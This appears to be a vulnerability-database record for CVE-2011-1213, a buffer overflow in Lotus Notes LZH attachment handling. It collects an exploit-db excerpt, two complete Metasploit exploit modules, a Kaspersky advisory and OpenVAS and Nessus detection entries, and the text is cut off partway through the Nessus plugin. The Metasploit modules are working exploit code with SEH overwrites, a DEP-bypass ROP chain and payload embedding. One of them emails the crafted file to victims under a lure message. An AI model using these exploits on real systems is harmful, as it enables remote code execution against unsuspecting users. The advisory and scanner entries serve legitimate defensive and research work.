DEP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 6745,\r\n\t\t\t\t\t\t\t'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'May 24 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\t#\r\n\t\t\t\t# Email options\r\n\t\t\t\t#\r\n\t\t\t\tOptString.new('FILENAME',\r\n\t\t\t\t\t[false, 'Sets the attachment file name', 'data.lzh']),\r\n\t\t\t\tOptString.new('MESSAGE',\r\n\t\t\t\t\t[false, 'Email message text', 'Important message, please view attachment!'])\r\n\t\t\t], self.class)\r\n\t\tregister_advanced_options(\r\n\t\t\t[\r\n\t\t\t\tOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ]),\r\n\t\t\t\tOptInt.new(\"ListenerTimeout\", [ false, \"The maximum number of seconds to wait for new sessions\", 0])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\theader = \"\\x08\"\t\t# Size of archived file header <-- 8 - 13 = FFFFFFF6\r\n\t\theader << \"\\x1a\"\t\t# 1 byte Header checksum\r\n\t\theader << \"-lh0-\"\t\t# Method ID (No compression)\r\n\t\theader << \"\\x7c\\x1a\\x00\\x00\"\t# Compressed file size\r\n\t\theader << \"\\x7c\\x1a\\x00\\x00\"\t# Uncompressed file size\r\n\t\theader << \"\\xB2\\x5e\\xab\\x3c\"\t# Original file date/time\r\n\t\theader << \"\\x20\"\t\t# File attribute\r\n\t\theader << \"\\x00\"\t\t# Level identifier\r\n\t\theader << \"\\x07\"\t\t# File name length\r\n\t\theader << \"poc.txt\"\t\t# File name\r\n\t\theader << \"\\x25\\x7d\"\t\t# 16 bit CRC of the uncompressed file\r\n\r\n\t\tlzh = header \r\n\t\tlzh << rand_text(target['Offset'])\r\n\r\n\t\tif (target == targets[0])\r\n\r\n\t\t\tlzh << generate_seh_record(target.ret)\r\n\t\t\tlzh << make_nops(8)\r\n\t\t\tlzh << payload.encoded\r\n\r\n\t\telsif (target == targets[1])\r\n\r\n\t\t\trop_nop = [0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll\r\n\r\n\t\t\trop_gadgets =\r\n\t\t\t[\r\n\t\t\t\t0x60524404, # POP EAX; RETN nnotes.dll\r\n\t\t\t\t0x7c37a140, # VirtualProtect() \r\n\t\t\t\t0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll\r\n\t\t\t\t0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll\r\n\t\t\t\t0x60620001, # POP EBP; RETN nnotes.dll\r\n\t\t\t\t0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll\r\n\t\t\t\t0x7c34280f, # POP EBX; RETN MSVCR71.dll\r\n\t\t\t\t0x00001954, # dwSize\r\n\t\t\t\t0x780ea001, # POP ECX; RETN MSVCP60.dll\r\n\t\t\t\t0x7c38b000, # lpflOldProtect\r\n\t\t\t\t0x60e73200, # POP EDI; RETN nnotes.dll\r\n\t\t\t\t0x60e73201, # RETN nnotes.dll\r\n\t\t\t\t0x601d5f02, # POP EDX; RETN nnotes.dll\r\n\t\t\t\t0x00000040, # flNewProtect\r\n\t\t\t\t0x60524404, # POP EAX; RETN nnotes.dll\r\n\t\t\t\t0x90909090, # NOP\r\n\t\t\t\t0x60820801, # PUSHAD; RETN nnotes.dll\r\n\t\t\t].pack(\"V*\")\r\n\r\n\t\t\tlzh << [target.ret].pack('V')\r\n\t\t\tlzh[32, rop_nop.length] = rop_nop\r\n\t\t\tlzh[220, rop_gadgets.length] = rop_gadgets\r\n\t\t\tlzh[289, payload.encoded.length] = payload.encoded\r\n\t\tend\r\n\r\n\t\tname = datastore['FILENAME'] || Rex::Text.rand_text_alpha(rand(10)+1) + \".lzh\"\r\n\t\tdata = datastore['MESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1)\r\n\r\n\t\tmsg = Rex::MIME::Message.new\r\n\t\tmsg.mime_defaults\r\n\t\tmsg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\r\n\t\tmsg.to = datastore['MAILTO']\r\n\t\tmsg.from = datastore['MAILFROM']\r\n\r\n\t\tmsg.add_part(Rex::Text.encode_base64(data, \"\\r\\n\"), \"text/plain\", \"base64\", \"inline\")\r\n\t\tmsg.add_part_attachment(lzh, name)\r\n\r\n\t\tsend_message(msg.to_s)\r\n\r\n\t\tprint_status(\"Waiting for a payload session (backgrounding)...\")\r\n\r\n\t\tif not datastore['ExitOnSession'] and not job_id\r\n\t\t\traise RuntimeError, \"Setting ExitOnSession to false requires running as a job (exploit -j)\"\r\n\t\tend\r\n\r\n\t\tstime = Time.now.to_f\r\n\t\tprint_status \"Starting the payload handler...\"\r\n\t\twhile(true)\r\n\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\tbreak if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )\r\n\r\n\t\t\tselect(nil,nil,nil,1)\r\n\t\tend\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17448/"}], "metasploit": [{"lastseen": "2020-10-06T01:00:24", "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net\n", "published": "2011-06-23T09:51:16", "type": "metasploit", "title": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/LOTUS/LOTUSNOTES_LZH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking # needs client interaction and permanent listener\n\n #\n # This module sends email messages via smtp\n #\n include Msf::Exploit::Remote::SMTPDeliver\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net\n\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'binaryhouse.net', # original discovery\n 'alino <26alino[at]gmail.com>', # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2011-1213'],\n ['OSVDB', '72706'],\n ['BID', '48018'],\n ['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'],\n ['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'],\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Platform' => ['win'],\n 'Targets' =>\n [\n [ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal',\n {\n 'Offset' => 6741,\n 'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll\n }\n ],\n\n [ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',\n {\n 'Offset' => 6745,\n 'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll\n }\n ],\n ],\n 'DisclosureDate' => 'May 24 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n #\n # Email options\n #\n OptString.new('FILENAME',\n [false, 'Sets the attachment file name', 'data.lzh']),\n OptString.new('MESSAGE',\n [false, 'Email message text', 'Important message, please view attachment!'])\n ])\n register_advanced_options(\n [\n OptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ]),\n OptInt.new(\"ListenerTimeout\", [ false, \"The maximum number of seconds to wait for new sessions\", 0])\n ])\n end\n\n def exploit\n\n header = \"\\x08\"\t\t# Size of archived file header <-- 8 - 13 = FFFFFFF6\n header << \"\\x1a\"\t\t# 1 byte Header checksum\n header << \"-lh0-\"\t\t# Method ID (No compression)\n header << \"\\x7c\\x1a\\x00\\x00\"\t# Compressed file size\n header << \"\\x7c\\x1a\\x00\\x00\"\t# Uncompressed file size\n header << \"\\xB2\\x5e\\xab\\x3c\"\t# Original file date/time\n header << \"\\x20\"\t\t# File attribute\n header << \"\\x00\"\t\t# Level identifier\n header << \"\\x07\"\t\t# File name length\n header << \"poc.txt\"\t\t# File name\n header << \"\\x25\\x7d\"\t\t# 16 bit CRC of the uncompressed file\n\n lzh = header\n lzh << rand_text(target['Offset'])\n\n if (target == targets[0])\n\n lzh << generate_seh_record(target.ret)\n lzh << make_nops(8)\n lzh << payload.encoded\n\n elsif (target == targets[1])\n\n rop_nop = [0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll\n\n rop_gadgets =\n [\n 0x60524404, # POP EAX; RETN nnotes.dll\n 0x7c37a140, # VirtualProtect()\n 0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll\n 0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll\n 0x60620001, # POP EBP; RETN nnotes.dll\n 0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll\n 0x7c34280f, # POP EBX; RETN MSVCR71.dll\n 0x00001954, # dwSize\n 0x780ea001, # POP ECX; RETN MSVCP60.dll\n 0x7c38b000, # lpflOldProtect\n 0x60e73200, # POP EDI; RETN nnotes.dll\n 0x60e73201, # RETN nnotes.dll\n 0x601d5f02, # POP EDX; RETN nnotes.dll\n 0x00000040, # flNewProtect\n 0x60524404, # POP EAX; RETN nnotes.dll\n 0x90909090, # NOP\n 0x60820801, # PUSHAD; RETN nnotes.dll\n ].pack(\"V*\")\n\n lzh << [target.ret].pack('V')\n lzh[32, rop_nop.length] = rop_nop\n lzh[220, rop_gadgets.length] = rop_gadgets\n lzh[289, payload.encoded.length] = payload.encoded\n end\n\n name = datastore['FILENAME'] || Rex::Text.rand_text_alpha(rand(10)+1) + \".lzh\"\n data = datastore['MESSAGE'] || Rex::Text.rand_text_alpha(rand(32)+1)\n\n msg = Rex::MIME::Message.new\n msg.mime_defaults\n msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\n msg.to = datastore['MAILTO']\n msg.from = datastore['MAILFROM']\n\n msg.add_part(Rex::Text.encode_base64(data, \"\\r\\n\"), \"text/plain\", \"base64\", \"inline\")\n msg.add_part_attachment(lzh, name)\n\n send_message(msg.to_s)\n\n print_status(\"Waiting for a payload session (backgrounding)...\")\n\n if not datastore['ExitOnSession'] and not job_id\n fail_with(Failure::Unknown, \"Setting ExitOnSession to false requires running as a job (exploit -j)\")\n end\n\n stime = Time.now.to_f\n print_status \"Starting the payload handler...\"\n while(true)\n break if session_created? and datastore['ExitOnSession']\n break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )\n\n select(nil,nil,nil,1)\n end\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/lotus/lotusnotes_lzh.rb"}, {"lastseen": "2020-06-18T22:36:51", "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered binaryhouse.net\n", "published": "2011-06-23T15:43:54", "type": "metasploit", "title": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/LOTUSNOTES_LZH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net\n\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'binaryhouse.net',\t\t# original discovery\n 'alino <26alino[at]gmail.com>',\t# Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2011-1213'],\n ['OSVDB', '72706'],\n ['BID', '48018'],\n ['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'],\n ['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'],\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Platform' => ['win'],\n 'Targets' =>\n [\n [ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal',\n {\n 'Offset' => 6741,\n 'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll\n }\n ],\n\n [ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',\n {\n 'Offset' => 6745,\n 'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll\n }\n ],\n ],\n 'DisclosureDate' => 'May 24 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.lzh']),\n ])\n end\n\n def exploit\n\n header = \"\\x08\"\t\t# Size of archived file header <-- 8 - 13 = FFFFFFF6\n header << \"\\x1a\"\t\t# 1 byte Header checksum\n header << \"-lh0-\"\t\t# Method ID (No compression)\n header << \"\\x7c\\x1a\\x00\\x00\"\t# Compressed file size\n header << \"\\x7c\\x1a\\x00\\x00\"\t# Uncompressed file size\n header << \"\\xB2\\x5e\\xab\\x3c\"\t# Original file date/time\n header << \"\\x20\"\t\t# File attribute\n header << \"\\x00\"\t\t# Level identifier\n header << \"\\x07\"\t\t# File name length\n header << \"poc.txt\"\t\t# File name\n header << \"\\x25\\x7d\"\t\t# 16 bit CRC of the uncompressed file\n\n lzh = header\n lzh << rand_text(target['Offset'])\n\n if (target == targets[0])\n\n lzh << generate_seh_record(target.ret)\n lzh << make_nops(8)\n lzh << payload.encoded\n\n elsif (target == targets[1])\n\n rop_nop = [0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll\n\n rop_gadgets =\n [\n 0x60524404, # POP EAX; RETN nnotes.dll\n 0x7c37a140, # VirtualProtect()\n 0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll\n 0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll\n 0x60620001, # POP EBP; RETN nnotes.dll\n 0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll\n 0x7c34280f, # POP EBX; RETN MSVCR71.dll\n 0x00001954, # dwSize\n 0x780ea001, # POP ECX; RETN MSVCP60.dll\n 0x7c38b000, # lpflOldProtect\n 0x60e73200, # POP EDI; RETN nnotes.dll\n 0x60e73201, # RETN nnotes.dll\n 0x601d5f02, # POP EDX; RETN nnotes.dll\n 0x00000040, # flNewProtect\n 0x60524404, # POP EAX; RETN nnotes.dll\n 0x90909090, # NOP\n 0x60820801, # PUSHAD; RETN nnotes.dll\n ].pack(\"V*\")\n\n lzh << [target.ret].pack('V')\n lzh[32, rop_nop.length] = rop_nop\n lzh[220, rop_gadgets.length] = rop_gadgets\n lzh[289, payload.encoded.length] = payload.encoded\n end\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n file_create(lzh)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/lotusnotes_lzh.rb"}], "kaspersky": [{"lastseen": "2020-09-02T11:58:31", "bulletinFamily": "info", "cvelist": ["CVE-2011-1217", "CVE-2011-1214", "CVE-2011-1218", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-1213"], "description": "### *Detect date*:\n05/31/2011\n\n### *Severity*:\nCritical\n\n### *Description*:\nAn unspecified vulnerability was found in IBM products. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely at a point related to gcc keys. Below is a complete list of vulnerabilities\n\n### *Affected products*:\nIBM Lotus Notes versions 8.5.2.2 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[IBM Notes](<https://threats.kaspersky.com/en/product/IBM-Notes/>)\n\n### *CVE-IDS*:\n[CVE-2011-1213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213>)9.3Critical \n[CVE-2011-1217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1217>)9.3Critical \n[CVE-2011-1218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1218>)9.3Critical \n[CVE-2011-1214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1214>)9.3Critical \n[CVE-2011-1216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1216>)9.3Critical \n[CVE-2011-1512](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1512>)9.3Critical", "edition": 41, "modified": "2020-05-22T00:00:00", "published": "2011-05-31T00:00:00", "id": "KLA10202", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10202", "title": "\r KLA10202ACE vulnerabilities in IBM Lotus Notes ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-04-27T19:22:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1215", "CVE-2011-1217", "CVE-2011-1214", "CVE-2011-1218", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-1213"], "description": "This host has IBM Lotus Notes installed and is prone to multiple\n buffer overflow vulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2011-06-07T00:00:00", "id": "OPENVAS:1361412562310801945", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801945", "type": "openvas", "title": "IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801945\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-07 13:29:28 +0200 (Tue, 07 Jun 2011)\");\n script_cve_id(\"CVE-2011-1213\", \"CVE-2011-1214\", \"CVE-2011-1215\", \"CVE-2011-1216\",\n \"CVE-2011-1217\", \"CVE-2011-1218\", \"CVE-2011-1512\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/44624\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/67621\");\n script_xref(name:\"URL\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21500034\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_ibm_lotus_notes_detect_win.nasl\");\n script_mandatory_keys(\"IBM/LotusNotes/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code in the\n context of the user running the application.\");\n script_tag(name:\"affected\", value:\"IBM Lotus Notes Version 8.5.2 FP2 and prior on windows\");\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - An error within 'xlssr.dll' when parsing a Binary File Format (BIFF)\n record in an Excel spreadsheet.\n\n - An integer underflow error within 'lzhsr.dll' when parsing header\n information in a LZH archive file.\n\n - A boundary error within 'rtfsr.dll' when parsing hyperlink information\n in a Rich Text Format (RTF) document.\n\n - A boundary error within 'mw8sr.dll' when parsing hyperlink information\n in a Microsoft Office Document (DOC) file.\n\n - A boundary error within 'assr.dll' when parsing tag information in an\n Applix Spreadsheet.\n\n - An unspecified error within 'kpprzrdr.dll' when parsing Lotus Notes .prz\n file format.\n\n - An unspecified error within 'kvarcve.dll' when parsing Lotus Notes .zip\n file format.\");\n script_tag(name:\"solution\", value:\"Upgrade to IBM Lotus Notes 8.5.2 FP3\");\n script_tag(name:\"summary\", value:\"This host has IBM Lotus Notes installed and is prone to multiple\n buffer overflow vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.ibm.com/software/lotus/products/notes/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nlotusVer = get_kb_item(\"IBM/LotusNotes/Win/Ver\");\nif(!lotusVer){\n exit(0);\n}\n\n## Match main version and ignore the build version\nversion = eregmatch(pattern:\"(([0-9]+\\.[0-9]+\\.[0-9]+).?([0-9]+)?)\", string: lotusVer);\nif(version[1] != NULL)\n{\n if(version_is_less_equal(version:version[1], test_version:\"8.5.2.2\")){\n report = report_fixed_ver(installed_version:version[1], vulnerable_range:\"Less than or equal to 8.5.2.2\");\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-09-04T14:20:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1215", "CVE-2011-1217", "CVE-2011-1214", "CVE-2011-1218", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-1213"], "description": "This host has IBM Lotus Notes installed and is prone to multiple\n buffer overflow vulnerabilities.", "modified": "2017-08-30T00:00:00", "published": "2011-06-07T00:00:00", "id": "OPENVAS:801945", "href": "http://plugins.openvas.org/nasl.php?oid=801945", "type": "openvas", "title": "IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_lotus_notes_mult_bof_vuln_win.nasl 7024 2017-08-30 11:51:43Z teissa $\n#\n# IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code in the\n context of the user running the application.\n Impact Level: Application\";\ntag_affected = \"IBM Lotus Notes Version 8.5.2 FP2 and prior on windows\";\ntag_insight = \"The flaws are due to:\n - An error within 'xlssr.dll' when parsing a Binary File Format (BIFF)\n record in an Excel spreadsheet.\n - An integer underflow error within 'lzhsr.dll' when parsing header\n information in a LZH archive file.\n - A boundary error within 'rtfsr.dll' when parsing hyperlink information\n in a Rich Text Format (RTF) document.\n - A boundary error within 'mw8sr.dll' when parsing hyperlink information\n in a Microsoft Office Document (DOC) file.\n - A boundary error within 'assr.dll' when parsing tag information in an\n Applix Spreadsheet.\n - An unspecified error within 'kpprzrdr.dll' when parsing Lotus Notes .prz\n file format.\n - An unspecified error within 'kvarcve.dll' when parsing Lotus Notes .zip\n file format.\";\ntag_solution = \"Upgrade to IBM Lotus Notes 8.5.2 FP3\n For updates refer to http://www.ibm.com/software/lotus/products/notes/\";\ntag_summary = \"This host has IBM Lotus Notes installed and is prone to multiple\n buffer overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(801945);\n script_version(\"$Revision: 7024 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-07 13:29:28 +0200 (Tue, 07 Jun 2011)\");\n script_cve_id(\"CVE-2011-1213\", \"CVE-2011-1214\", \"CVE-2011-1215\", \"CVE-2011-1216\",\n \"CVE-2011-1217\", \"CVE-2011-1218\", \"CVE-2011-1512\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"IBM Lotus Notes File Viewers Multiple BOF Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/44624\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/67621\");\n script_xref(name : \"URL\" , value : \"https://www-304.ibm.com/support/docview.wss?uid=swg21500034\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH,\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_ibm_lotus_notes_detect_win.nasl\");\n script_require_keys(\"IBM/LotusNotes/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get for IBM Lotus Notes Version\nlotusVer = get_kb_item(\"IBM/LotusNotes/Win/Ver\");\nif(!lotusVer){\n exit(0);\n}\n\n## Match main version and ignore the build version\nversion = eregmatch(pattern:\"(([0-9]+\\.[0-9]+\\.[0-9]+).?([0-9]+)?)\", string: lotusVer);\nif(version[1] != NULL)\n{\n ## Check for IBM Lotus Notes Version < 8.5.2 FP3\n if(version_is_less_equal(version:version[1], test_version:\"8.5.2.2\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-06-16T03:03:50", "description": "The file attachment viewer component included with the instance of\nLotus Notes installed on the remote Windows host is reportedly\naffected by several buffer overflow vulnerabilities that can be\ntriggered when handling attachments of various types.\n\nBy sending a specially crafted attachment to users of the affected\napplication and getting them to double-click and view the attachment,\nan attacker may be able to execute arbitrary code subject to the\nprivileges under which the affected application runs.", "edition": 21, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2011-05-31T00:00:00", "title": "IBM Lotus Notes Attachment Handling Multiple Buffer Overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1215", "CVE-2011-1217", "CVE-2011-1214", "CVE-2011-1218", "CVE-2011-0548", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-1213"], "modified": "2011-05-31T00:00:00", "cpe": ["cpe:/a:ibm:lotus_notes"], "id": "NOTES_KEYVIEW_OVERFLOWS2.NASL", "href": "https://www.tenable.com/plugins/nessus/54922", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(54922);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\n \"CVE-2011-0548\",\n \"CVE-2011-1213\",\n \"CVE-2011-1214\",\n \"CVE-2011-1215\",\n \"CVE-2011-1216\",\n \"CVE-2011-1217\",\n \"CVE-2011-1218\",\n \"CVE-2011-1512\"\n );\n script_bugtraq_id(\n 47962,\n 48013,\n 48016,\n 48017,\n 48018,\n 48019,\n 48020,\n 